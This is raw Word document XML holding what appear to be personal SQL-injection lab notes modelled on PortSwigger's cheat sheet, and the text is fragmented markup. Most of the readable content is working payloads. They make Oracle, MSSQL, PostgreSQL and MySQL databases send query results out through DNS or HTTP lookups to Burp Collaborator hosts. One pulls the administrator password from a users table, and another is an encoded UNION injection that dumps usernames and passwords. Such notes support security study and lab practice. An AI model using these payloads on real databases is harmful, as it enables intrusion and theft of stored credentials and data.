                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>LOAD_FILE('\\\\BURP-COLLABORATOR-SUBDOMAIN\\a')</w:t>
            </w:r>
            <w:r w:rsidRPr="00384A1B">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00384A1B">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier"/>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>SELECT ... INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35FDA117" w14:textId="5E19B63C" w:rsidR="00267AF4" w:rsidRPr="00384A1B" w:rsidRDefault="00267AF4" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B71158F" w14:textId="6EEF5E65" w:rsidR="00267AF4" w:rsidRPr="00384A1B" w:rsidRDefault="002A1054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'; exec master..xp_dirtree '//0efdymgw1o5w9inae8mg4dfrgim9ay.burpcollaborator.net/a'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D2D2F5" w14:textId="77777777" w:rsidR="002111C3" w:rsidRPr="00384A1B" w:rsidRDefault="002111C3" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BA7F647" w14:textId="7B11F614" w:rsidR="00267AF4" w:rsidRPr="00384A1B" w:rsidRDefault="002111C3" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>TrackingId=</w:t>
      </w:r>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>x'+UNION+SELECT+EXTRACTVALUE</w:t>
      </w:r>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>(xmltype('&lt;%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f&gt;&lt;!DOCTYPE+root+[+&lt;!ENTITY+%25+remote+SYSTEM+"http%3a//BURP-COLLABORATOR-SUBDOMAIN/"&gt;+%25remote%3b]&gt;'),'/l')+FROM+dua</w:t>
      </w:r>
      <w:r w:rsidR="00903D90" w:rsidRPr="00384A1B">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">-- </w:t>
      </w:r>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">(Oracle does not support executing multiple queries in succession) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE7D0F7" w14:textId="5DD68AD8" w:rsidR="00267AF4" w:rsidRPr="00384A1B" w:rsidRDefault="00267AF4" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A9971FD" w14:textId="79572035" w:rsidR="002111C3" w:rsidRPr="00384A1B" w:rsidRDefault="002111C3" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Exfiltrate data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7B77C2" w14:textId="77777777" w:rsidR="002111C3" w:rsidRPr="00384A1B" w:rsidRDefault="002111C3" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr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511"/>
      </w:tblGrid>
      <w:tr w:rsidR="002111C3" w:rsidRPr="00384A1B" w14:paraId="73270674" w14:textId="77777777" w:rsidTr="002111C3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42795EA4" w14:textId="77777777" w:rsidR="002111C3" w:rsidRPr="00384A1B" w:rsidRDefault="002111C3" w:rsidP="002111C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Oracle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45309092" w14:textId="77777777" w:rsidR="002111C3" w:rsidRPr="00384A1B" w:rsidRDefault="002111C3" w:rsidP="002111C3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SELECT EXTRACTVALUE(xmltype('&lt;?xml version="1.0" encoding="UTF-8"?&gt;&lt;!DOCTYPE root [ &lt;!ENTITY % remote SYSTEM "http://'||(SELECT YOUR-QUERY-HERE)||'.BURP-COLLABORATOR-SUBDOMAIN/"&gt; %remote;]&gt;'),'/l') FROM dual</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002111C3" w:rsidRPr="00384A1B" w14:paraId="574F9DE7" w14:textId="77777777" w:rsidTr="002111C3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B2F930A" w14:textId="77777777" w:rsidR="002111C3" w:rsidRPr="00384A1B" w:rsidRDefault="002111C3" w:rsidP="002111C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Microsoft</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B28CD10" w14:textId="77777777" w:rsidR="002111C3" w:rsidRPr="00384A1B" w:rsidRDefault="002111C3" w:rsidP="002111C3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declare @p varchar(1024);set @p=(SELECT YOUR-QUERY-HERE);exec('master..xp_dirtree "//'+@p+'.BURP-COLLABORATOR-SUBDOMAIN/a"')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002111C3" w:rsidRPr="00384A1B" w14:paraId="3F37767A" w14:textId="77777777" w:rsidTr="002111C3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24697E83" w14:textId="77777777" w:rsidR="002111C3" w:rsidRPr="00384A1B" w:rsidRDefault="002111C3" w:rsidP="002111C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t>PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E272806" w14:textId="77777777" w:rsidR="002111C3" w:rsidRPr="00384A1B" w:rsidRDefault="002111C3" w:rsidP="002111C3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create OR replace function f() returns void as $$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declare c text;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declare p text;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lastRenderedPageBreak/>
              <w:t>begin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SELECT into p (SELECT YOUR-QUERY-HERE);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c := 'copy (SELECT '''') to program ''nslookup '||p||'.BURP-COLLABORATOR-SUBDOMAIN''';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execute c;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END;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$$ language plpgsql security definer;</w:t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br/>
              <w:t>SELECT f();</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002111C3" w:rsidRPr="00384A1B" w14:paraId="45BD334E" w14:textId="77777777" w:rsidTr="002111C3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DC8E961" w14:textId="77777777" w:rsidR="002111C3" w:rsidRPr="00384A1B" w:rsidRDefault="002111C3" w:rsidP="002111C3">
            <w:pPr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</w:pPr>
            <w:r w:rsidRPr="00384A1B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FAE1DE2" w14:textId="77777777" w:rsidR="002111C3" w:rsidRPr="00384A1B" w:rsidRDefault="002111C3" w:rsidP="002111C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="de-DE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00384A1B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>The following technique works on Windows only:</w:t>
            </w:r>
            <w:r w:rsidRPr="00384A1B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="de-DE"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00384A1B">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>SELECT YOUR-QUERY-HERE INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73A636F6" w14:textId="4A976205" w:rsidR="00267AF4" w:rsidRPr="00384A1B" w:rsidRDefault="00267AF4" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C982DF6" w14:textId="17D3168F" w:rsidR="00267AF4" w:rsidRPr="00384A1B" w:rsidRDefault="002111C3" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384A1B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'; declare @p varchar(1024);set @p=(SELECT password FROM users WHERE username='administrator');exec('master..xp_dirtree "//'+@p+'.cwcsgt05ikji0n1f2qlzn5118sek29.burpcollaborator.net/a"')--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE8B417" w14:textId="1651AE79" w:rsidR="00267AF4" w:rsidRPr="00384A1B" w:rsidRDefault="00267AF4" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="569F22CF" w14:textId="33001F0D" w:rsidR="00267AF4" w:rsidRPr="00384A1B" w:rsidRDefault="00903D90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password will be sent to Collaborator as subdomain in Host header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC787E9" w14:textId="6DB5EC07" w:rsidR="00267AF4" w:rsidRPr="00384A1B" w:rsidRDefault="00267AF4" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5141672D" w14:textId="77777777" w:rsidR="009F05E1" w:rsidRPr="00384A1B" w:rsidRDefault="009F05E1" w:rsidP="009F05E1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384A1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>SQL injection in different contexts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772CC871" w14:textId="13A5279A" w:rsidR="00267AF4" w:rsidRPr="00384A1B" w:rsidRDefault="006D0831" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>use Hackvertor to</w:t>
      </w:r>
      <w:r w:rsidR="00F21D5A" w:rsidRPr="00384A1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> encode the</w:t>
      </w:r>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> XML payload</w:t>
      </w:r>
      <w:r w:rsidR="00F21D5A" w:rsidRPr="00384A1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27186840" w14:textId="6E642DD9" w:rsidR="00267AF4" w:rsidRPr="00384A1B" w:rsidRDefault="00267AF4" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="143FCC6E" w14:textId="1A06E334" w:rsidR="00267AF4" w:rsidRPr="00384A1B" w:rsidRDefault="006D0831" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>&lt;storeId&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>&lt;@hex_entities&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>1 UNION SELECT username || '~' || password FROM users</w:t>
      </w:r>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>&lt;@/hex_entities&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>&lt;/storeId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFA52A2" w14:textId="0740FA48" w:rsidR="00267AF4" w:rsidRPr="00384A1B" w:rsidRDefault="00267AF4" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62CE3F25" w14:textId="1D5967FA" w:rsidR="00267AF4" w:rsidRPr="00384A1B" w:rsidRDefault="00267AF4" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09F6AD20" w14:textId="575C6D28" w:rsidR="00267AF4" w:rsidRPr="00384A1B" w:rsidRDefault="00267AF4" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FD46AC8" w14:textId="63112690" w:rsidR="00267AF4" w:rsidRPr="00384A1B" w:rsidRDefault="00267AF4" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24014D16" w14:textId="60F7189C" w:rsidR="00267AF4" w:rsidRPr="00384A1B" w:rsidRDefault="00267AF4" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2474EBDA" w14:textId="77777777" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00D91F77" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidSect="002F5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F3044"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="95A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2F5A52"/>
    <w:rsid w:val="00065FC4"/>
    <w:rsid w:val="000D7705"/>
    <w:rsid w:val="001A50BC"/>
    <w:rsid w:val="002111C3"/>
    <w:rsid w:val="00265596"/>
    <w:rsid w:val="00267AF4"/>
    <w:rsid w:val="002A1054"/>
    <w:rsid w:val="002F5A52"/>
    <w:rsid w:val="002F780D"/>
    <w:rsid w:val="00384A1B"/>
    <w:rsid w:val="003958FF"/>
    <w:rsid w:val="00423B5C"/>
    <w:rsid w:val="004D666C"/>
    <w:rsid w:val="005017A9"/>
    <w:rsid w:val="005474B7"/>
    <w:rsid w:val="005509B1"/>
    <w:rsid w:val="00695BDC"/>
    <w:rsid w:val="006D0831"/>
    <w:rsid w:val="006D536A"/>
    <w:rsid w:val="006F1C39"/>
    <w:rsid w:val="008A2499"/>
    <w:rsid w:val="00903D90"/>
    <w:rsid w:val="009F05E1"/>
    <w:rsid w:val="00A40A64"/>
    <w:rsid w:val="00B739B8"/>
    <w:rsid w:val="00C26790"/>
    <w:rsid w:val="00C36527"/>
    <w:rsid w:val="00C54163"/>
    <w:rsid w:val="00C5522E"/>
    <w:rsid w:val="00C847F2"/>
    <w:rsid w:val="00CC3B25"/>
    <w:rsid w:val="00D573F8"/>
    <w:rsid w:val="00D91F77"/>
    <w:rsid w:val="00DD5CEF"/>
    <w:rsid w:val="00DE5DBE"/>
    <w:rsid w:val="00F03E3F"/>
    <w:rsid w:val="00F1209A"/>
    <w:rsid w:val="00F2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59EC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{502441CF-4296-42AE-9561-751D7EB9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yperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D91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7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91F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7AF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384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x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burp/application-security-testing/oast" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/sql-injection/cheat-she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1084</Words>
  <Characters>6831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8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-10-19T07:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-17T11:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>